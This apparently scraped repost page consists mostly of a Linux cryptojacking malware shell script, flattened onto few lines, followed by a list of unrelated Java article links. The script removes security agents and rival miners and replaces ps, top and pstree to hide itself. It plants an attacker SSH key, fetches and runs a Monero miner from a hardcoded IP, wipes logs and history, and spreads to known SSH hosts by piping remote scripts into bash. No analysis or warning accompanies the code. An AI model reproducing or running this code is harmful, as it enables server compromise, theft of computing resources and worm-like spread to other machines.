/.Xll/xr>/.Xll/xrchattr +ia /.Xll/xrchattr -ia /etc/trace>/etc/tracechattr +ia /etc/tracechattr -ia /etc/newsvc.shchattr -ia /etc/svc*chattr -ia /tmp/newsvc.shchattr -ia /tmp/svc*>/etc/newsvc.sh>/etc/svcupdate>/etc/svcguard>/etc/svcworkmanager>/etc/svcupdates>/tmp/newsvc.sh>/tmp/svcupdate>/tmp/svcguard>/tmp/svcworkmanager>/tmp/svcupdateschattr +ia /etc/newsvc.shchattr +ia /etc/svc*chattr +ia /tmp/newsvc.shchattr +ia /tmp/svc*sleep 1chattr -ia /etc/phpupdatechattr -ia /etc/phpguardchattr -ia /etc/networkmanagerchattr -ia /etc/newdat.sh>/etc/phpupdate>/etc/phpguard>/etc/networkmanager>/etc/newdat.shchattr +ia /etc/phpupdatechattr +ia /etc/phpguardchattr +ia /etc/networkmanagerchattr +ia /etc/newdat.shsleep 1chattr -i /usr/lib/systemd/systemd-update-dailyecho 1 > /usr/lib/systemd/systemd-update-dailychattr +i /usr/lib/systemd/systemd-update-daily#yum install -y docker.io || apt-get install docker.io;docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %#echo SELINUX=disabled >/etc/selinux/configservice apparmor stopsystemctl disable apparmorservice aliyun.service stopsystemctl disable aliyun.serviceps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %rm -rf /usr/local/aegischattr -R -ia /var/spool/cronchattr -ia /etc/crontabchattr -R -ia /etc/cron.dchattr -R -ia /var/spool/cron/crontabscrontab -rrm -rf /var/spool/cron/*rm -rf /etc/cron.d/*rm -rf /var/spool/cron/crontabsrm -rf /etc/crontab}kill_sus_proc(){ ps axf -o "pid"|while read procid do ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then cat /proc/$procid/cmdline| grep -a -E "zzh" if [ $? -ne 0 ] then kill -9 $procid else echo "don't kill" fi fi done ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do cat /proc/$procid/cmdline| grep -a -E "zzh" if [ $? -ne 0 ] then kill -9 $procid else echo "don't kill" fi done}downloads(){ if [ -f "/usr/bin/curl" ] then echo $1,$2 http_code=`curl -I -m 50 -o /dev/null -s -w %{ http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 100 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 100 --retry 100 $1 > $2 else curl --connect-timeout 100 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cd1" ] then http_code=`cd1 -I -m 50 -o /dev/null -s -w %{ http_code} $1` if [ "$http_code" -eq "200" ] then cd1 --connect-timeout 100 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cd1 --connect-timeout 100 --retry 100 $1 > $2 else cd1 --connect-timeout 100 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/wget" ] then wget --timeout=50 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=100 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wd1" ] then wd1 --timeout=100 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wd1 --timeout=100 --tries=100 -O $2 $3 fi fi}kill_miner_prockill_sus_procunlock_cron(){ chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /var/spool/cron/crontabs chattr -R -ia /etc/cron.d}lock_cron(){ chattr -R +ia /var/spool/cron chattr +ia /etc/crontab chattr -R +ia /var/spool/cron/crontabs chattr -R +ia /etc/cron.d}if [ -f "$rtdir" ]then echo "i am root" mkdir -p /root/.ssh echo "goto 1" >> /etc/zzhs chattr -ia /etc/zzh* chattr -ia/etc/config.json* chattr -ia /etc/newinit.sh* chattr -ia /root/.ssh/authorized_keys* chattr -R -ia /root/.ssh if [ -f "/bin/ps.original" ] then echo "/bin/ps changed" else mv /bin/ps /bin/ps.original echo "#! /bin/bash">>/bin/ps echo "ps.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/ps chmod +x /bin/ps touch -d 20160825 /bin/ps echo "/bin/ps changing" fi if [ -f "/bin/top.original" ] then echo "/bin/top changed" else mv /bin/top /bin/top.original echo "#! /bin/bash">>/bin/top echo "top.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/top chmod +x /bin/top touch -d 20160825 /bin/top echo "/bin/top changing" fi if [ -f "/bin/pstree.original" ] then echo "/bin/pstree changed" else mv /bin/pstree /bin/pstree.original echo "#! /bin/bash">>/bin/pstree echo "pstree.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/pstree chmod +x /bin/pstree touch -d 20160825 /bin/pstree echo "/bin/pstree changing" fi if [ -f "/bin/chattr" ] then chattrsize=`ls -l /bin/chattr | awk '{ print $5 }'` if [ "$chattrsize" -lt "$chattr_size" ] then yum -y remove e2fsprogs yum -y install e2fsprogs else echo "no need install chattr" fi else yum -y remove e2fsprogs yum -y install e2fsprogs fi unlock_cron rm -f ${ crondir} rm -f /etc/cron.d/zzh rm -f /etc/crontab echo "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${ crondir} echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzh echo "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontab echo crontab created lock_cron chmod 700 /root/.ssh/ echo >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver" > /root/.ssh/authorized_keys cd1 http://199.19.226.117/b2f628/call.txt wget -q -O- http://199.19.226.117/b2f628/call.txt cd1 http://199.19.226.117/b2f628/call.txt wget -q -O- http://199.19.226.117/b2f628/call.txt cfg="/etc/config.json" file="/etc/zzh" if [-f "/etc/config.json" ] then filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'` if [ "$filesize_config" -ne "$config_size" ] then pkill -f zzh rm /etc/config.json downloads $config_url /etc/config.json $config_url_backup else echo "no need download" fi else downloads $config_url /etc/config.json $config_url_backup fi if [ -f "/etc/zzh" ] then filesize1=`ls -l /etc/zzh | awk '{ print $5 }'` if [ "$filesize1" -ne "$miner_size" ] then pkill -f zzh rm /etc/zzh downloads $miner_url /etc/zzh $miner_url_backup else echo "not need download" fi else downloads $miner_url /etc/zzh $miner_url_backup fi downloads $sh_url /etc/newinit.sh $sh_url_backup chmod 777 /etc/zzh if [ -f "/bin/ps.original" ] then ps.original -fe|grep zzh |grep -v grep else ps -fe|grep zzh |grep -v grep fi if [ $? -ne 0 ] then cd /etc echo "not root runing" sleep 5s cpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l`if (("$cpunum"<=2 )); then cpunum=1 echo $cpunumelif (("$cpunum"<=4)); then cpunum=2 echo $cpunumelif (("$cpunum"<=8)); then cpunum=4 echo $cpunumelif (("$cpunum"<=16)); then cpunum=8 echo $cpunumelif (("$cpunum"<=32)); then cpunum=16 echo $cpunumelif (("$cpunum"<=64)); then cpunum=32 echo $cpunumelif (("$cpunum">64)); then cpunum=50 echo $cpunumelse cpunum=1fi ./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x & else echo "root runing....." fi chmod 777 /etc/zzh chattr +ia /etc/zzh chmod 777 /etc/config.json chattr +ia /etc/config.json chmod 777 /etc/newinit.sh chattr +ia /etc/newinit.sh chmod 600 /root/.ssh/authorized_keys chattr +ia /root/.ssh/authorized_keyselse echo "goto 1" > /tmp/zzhs chattr -ia /tmp/zzh* chattr -ia /tmp/config.json* chattr -ia /tmp/newinit.sh* if [ ! -f "/usr/bin/crontab" ] then unlock_cron echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${ crondir} lock_cron else unlock_cron [[ $cont =~ "newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab - lock_cron fi if [ -f "/tmp/config.json" ] then filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'` if [ "$filesize1" -ne "$config_size" ] then pkill -f zzh rm /tmp/config.json downloads $config_url /tmp/config.json $config_url_backup else echo "no need download" fi else downloads $config_url /tmp/config.json $config_url_backup fi if [ -f "/tmp/zzh" ] then filesize1=`ls -l /tmp/zzh | awk '{ print $5 }'` if [ "$filesize1" -ne "$miner_size" ] then pkill -f zzh rm /tmp/zzh downloads $miner_url /tmp/zzh $miner_url_backup else echo "no need download" fi else downloads $miner_url /tmp/zzh $miner_url_backup fi echo "i am here" downloads $sh_url /tmp/newinit.sh $sh_url_backup ps -fe|grep zzh |grep -v grep if [ $? -ne 0 ] then echo "not tmp runing" cd /tmp chmod 777 zzh sleep 5s cpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l`if (("$cpunum"<=2 )); then cpunum=1 echo $cpunumelif (("$cpunum"<=4)); then cpunum=2 echo $cpunumelif (("$cpunum"<=8)); then cpunum=4 echo $cpunumelif (("$cpunum"<=16)); then cpunum=8 echo $cpunumelif (("$cpunum"<=32)); then cpunum=16 echo $cpunumelif (("$cpunum"<=64)); then cpunum=32 echo $cpunumelif (("$cpunum">64)); then cpunum=50 echo $cpunumelse echo other fi ./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x & else echo "tmp runing....." fi chmod 777 /tmp/zzh chattr +i /tmp/zzh chmod 777 /tmp/newinit.sh chattr +i /tmp/newinit.sh chmod 777 /tmp/config.json chattr +i /tmp/config.json fiiptables -Fiptables -Xiptables -A OUTPUT -p tcp --dport 5555 -j DROPiptables -A OUTPUT -p tcp --dport 7777 -j DROPiptables -A OUTPUT -p tcp --dport 9999 -j DROPiptables -A OUTPUT -p tcp --dport 9999 -j DROPservice iptables reloadps auxf|grep -v grep|grep -v 43Xbgtym2GZWBk87XiYbCpTKGPBTxY|grep "stratum"|awk '{print $2}'|xargs kill -9history -cecho > /var/spool/mail/rootecho > /var/log/wtmpecho > /var/log/secureecho > /root/.bash_historyyum install -y bash 2>/dev/nullapt install -y bash 2>/dev/nullapt-get install -y bash 2>/dev/nullif [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & donefiif [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & donefiecho "$bbdir"echo "$bbdira"$bbdir -fsSL http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash$bbdira -fsSL http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash 转载地址:http://gteab.baihongyu.com/
你可能感兴趣的文章
Servlet的生命周期总结及虚拟路径的配置方法
查看>>
JSP的脚本元素及EL表达式的快速入门的学习总结
查看>>
JSP--9大隐式对象
查看>>
Servelt中主要对象的使用
查看>>
EL表达式的深刻认识
查看>>
JSP技术的学习总结
查看>>
JavaBean的初步认知
查看>>
重识java反射
查看>>
Spring的核心中IOC、DI
查看>>
Spring中注解的使用
查看>>
Spring的认识
查看>>
gitee的使用
查看>>
maven项目出现如下错误,求指点;CoreException: Could not calculate build plan:
查看>>
理解Paxos算法的证明过程
查看>>
详解 JVM Garbage First(G1) 垃圾收集器
查看>>
Java 8 函数式编程入门之Lambda
查看>>
用高阶函数轻松实现Java对象的深度遍历
查看>>
WindowsApi+Easyx图形库的透明时钟
查看>>
Eclipse LUNA配置TomCat(非j2ee版本)
查看>>
树莓派安装mysql-srver报错 404 not found!
查看>>